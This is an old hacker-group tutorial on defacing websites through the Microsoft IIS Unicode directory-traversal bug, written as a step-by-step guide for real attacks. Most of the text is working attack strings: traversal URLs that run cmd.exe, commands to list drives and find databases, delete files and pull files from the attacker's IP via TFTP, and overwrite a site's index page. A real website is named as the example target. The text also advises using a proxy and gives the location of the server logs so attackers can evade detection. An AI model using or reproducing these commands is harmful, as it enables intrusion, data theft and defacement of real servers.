RRRRRRRRRRRRRRRRR FFFFFFFFFFFFFFFFFFFF
RRRRRRRRRRRRRRRRRR FFFFFFFFFFFFFFFFFFFF
RRRRRRRRRRRRRRRRRRR FFFF
RRRR RRRRR FFFF
RRRR RRRRR FFFF
RRRR RRRR FFFF
RRRRRRRRRRRRRRRRR FFFFFFFFFFFF
RRRRRRRRRRRRRRR OOOOOOOOOOOOOO FFFFFFFFFFFF
RRRRRRRRRRRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRRRR FFFF
:::::::::===============:::::::::::
I I S
E X P L O I T (Defacing sites)
:::::::::===============:::::::::::
Ok well I have been asked by many how to hack websites. I try to help out,
but most are too far behind to know what I'm talking about.
So in this tutorial I will tell you about the IIS exploit and how to effeciently use it to
get what you want.
This tutorial will remain the property of Reign of Fire. Please do not copy this tutorial without permission from me AcId R3IgN.
Thank you.
Also if your having problems reading this cause you have to scroll too far? Then just turn wordwrap on... then you can print the whole document. :)
Ok the first step is finding an exploitable system.
Now I have no programs for doing this so you'll have to do this the hard and long way.
But who cares, hackers like to do it the hard way don't they? :)
Now, what you will have to do is find out in whish part of the system the bug can be exploited.
These are the directories of the system where the bug can be exploited...
1. /IISADMPWD
2. /scripts
3. /msadc
4. /wwwroot
5. /cgi-bin
6. /_vti_bin
Ok now, what you have to do is open up your internet browser..
Yes that's all you need, just your simple internet browser. You could download some hacker program to do all this automatically, but we're gonna do it the 1337 way. :)
Ok once you've opened the browser you have to put some special strings in the URL field after the specific URL to see if it is exploitable.
Now here's how we do it.
We will take www.tombraider.com as an example. (That one just popped into my head if your wondering)
Now this site WAS exploitable, but now it has been patched up.. I think. And I hope.
Now the actual exploit is a string, made up of some bits and pieces.
This is the string..
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
Notice that when you put this stiring at the end of the URL you SHOULD have a directory listing of the specific drive.
Eg:
http://www.tombraider.com/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
No if this server is exploitable and if the exploit is in the /IISADMPWD dir then you will get a DIR listing.
If you see nothing, and get nothing but an error then you should move on to the next dir... such as /scripts.
So all you would do with the above example is change the /IISADMPWD bit to /scripts and see if you get a DIR listing.
If you have done all the DIR's and you have still had no DIR listing then, I guess you'll have to move on to the next system.
I also suggest that before you even try doing this you would check to see if the server is Running Microsoft IIS NT server.
There are many ways to check this (many programs, methods ad sites to see this), I say it's wise to check this, as if you are trying the IIS exploit on a certain system, but it is not running Microsofts NT, but is running Apache, then obviously you are wasting your time, so you would either move on to the next system or try to hack into this Apache (or whatever) server.
Now I will list all of the above dir strings in a list for you.
1. Url of the Server/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
2. Url of the Server/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
3. Url of the Server/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
4. Url of the Server/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
5. Url of the Server/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
6. Url of the Server/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
And there you have them..
Now I have found that the most common string would be the /scripts but if you find nothing there then just move on to the next string
Ok so what if you have found a DIR listing with one of the exploits?
=====================================================================
Well once you have found a DIR listing then you can do a heap of commands with this exploit.
It's just like commanding your own computer from DOS, (you will have to know some windows commands if you don't already).
Now I will give you a few examples of some things you can do, and the rest you can probably figure out yourselves.
1. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\
eg: http://www.tombraider.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\
This will list the contents of C:\
2. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.mdb
This will list all mdb's available.
3. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20uhauhauhua>%20test.txt
This will make a test.txt file
4. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\test.txt
This will delete test.txt
5. Url of the page/Exploited dir
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type\c%20c:\teste.mdb
This will download the file test.txt and will try to open
it, you won't succeed because the "type" will insert a line of code into that file, but if you
know how to crack basic files, this should be no problem.
So you get the point now.... you can try commands like echo, del, mkdir, attrib.. whatever.. ok?
No how would we go about uploading files??
===========================================
Hm.. well the first thing we need is TFTP. This is a program that allows you to upload and ownload files to a remote server.
Now this is a small program so this can be downloaded everywhere, try www.downloads.com.
And I will add it to my site too.. http://rofhackers.cjb.net/ very soon.
Nowe lets just pretend that you have TFTP installed on your computer (If you have it "good" if you don't "get it")
Now this is the string you will need to type in in your browser for you to download/upload something to the server.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/
cmd.exe?/c%20tftp%20-i%20here you will add your IP%20get%20here you will enter the file location
where the file is in you own box%20here you will add the location where you want the file to be
uploaded to the Server.
eg:
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/c
md.exe?/c%20tftp%20-i%20200.200.200.200%20get%20c:\windows\calc.exe%20c:\winnt\system32
\calc.exe
Understand?? If you don't then just read over it a couple of times, you'll get it.
Now to change the index.htm (or the main page of the site)
I have found that on lots of servers the name of the html page could be the following.
default.htm, default.asp, index.htm, and index.asp.
It could be any of those, so you will need to look carefully for the one that you need.
Ok now lets say the file is called index.htm..
and lets say we find this file in C:\inetpub\wwwroot\index.htm
(the html files are nearly always in this directory)
You would type the following.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/c
md.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20c:\inetpub\wwwroot\"any file".exe
Results are as fallows:
- Copy CMD.exe to the same folder where index is located.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/inetpub/wwwroot/
any type.exe?/c%20echo%20index information that is what you want to display on index>%20index.htm
This is the second example:
============================
Lets just pretend that the index page is on:
d:\inetpub\wwwroot\index.htm
- If for some weird reason the server iss on C: and the index is located at a different driver
then proceed as follows.
Url of the page/Exploited dir
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/c
md.exe?/c%20echo%20AcId R3IgN is da man>%20c:\test.txt - Creates a text file with the content of
"AcId R3IgN is da man"
Url of the page/Exploited dir
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/c
md.exe?/c%20copy%20/y%20c:\test.txt%20d:\inetpub\wwwroot\index.htm
- Copy the content of test.txt to index..html
So thats it...
This concludes our tutorial into hacking a windows NT server with your browser.
This tutorial might have been a bit hard to understand... and I forgive you for that.
But if you read over it a few times, and use your common sence then you will figure the rest out for yourself.
Also it is IMPERATIVE that before you begin, you use a PROXY SERVER.
As all servers will log your IP, and all activity, and you don't wanna get busted do ya? ;)
Also THE LOGS ARE BY DEFAULT ON C:\WINNT\SYSTEM32\LOGFILES\W3SVC32
W3SVC32 - IS THE DEFAULT FOLDER WHERE THE LOG FILES ARE, IF THE FOLDER IS NOT THERE TRY TO
FIND IT AND UPDATE IS AS NEEDED.
Isn't there an easier way? I hear you say!
===========================================
Well yes infact there are tonns of easier ways to do this.
You can get heaps of programs from the net... and a member of ours is making a program to exploit this.
And we hope he shares it with us, because we've been having a few problems, so BOOT DADDY, if you're reading this, we would really like to
have your program on our site.
I am of course planning to make my own program, but I have actually little time to do this, it even took me a while to write a tutorial.
(probly 2 mins a day is all I have time for) But hey..
I finished it. :)
You could however make your own program using these strings, and hack pages using your own program.
This is the most 1337 way to do things.. (making a program, and using it to exploit a system)
It's way better than downloading a program made by someone else, and using that like a script kiddie right?¿ :)
Well happy hacking.
Greetz:
========
Greetz goto my girlfriend Evi, for putting up with me when I left her downstairs playing the playstation while I went up stairs to sit at my computer.
I'm really sorry for that.
EnragedJerry, for being just a cool dude. I've helped him out a bit, and he's kept me comany while I was just sittin around. So congrats on your hacks dude.
My parents, for never seeing me.. :) I'm always in my bedroom behind my computer... sorry guys.
My whole family, for being family I s'pose.
The BOX network, for there cool chat sessions.
Reign of Fire... cause they rule.. ;)
WoH -- They are the best.. No|d and RaFa rule! :) Yo dudes.
My friends... Thommy and Timpie.
Boot Daddy, for making a program for us.
And my computer for not crashing on me, and doing what I want :) LOL Thank you babe. :)
Well see yas.
AcId R3IgN
rofhackers@yahoo.com
webmaster@rofhackers.org
http://rofhackers.cjb.net/
(
geocities.com/eljehad1)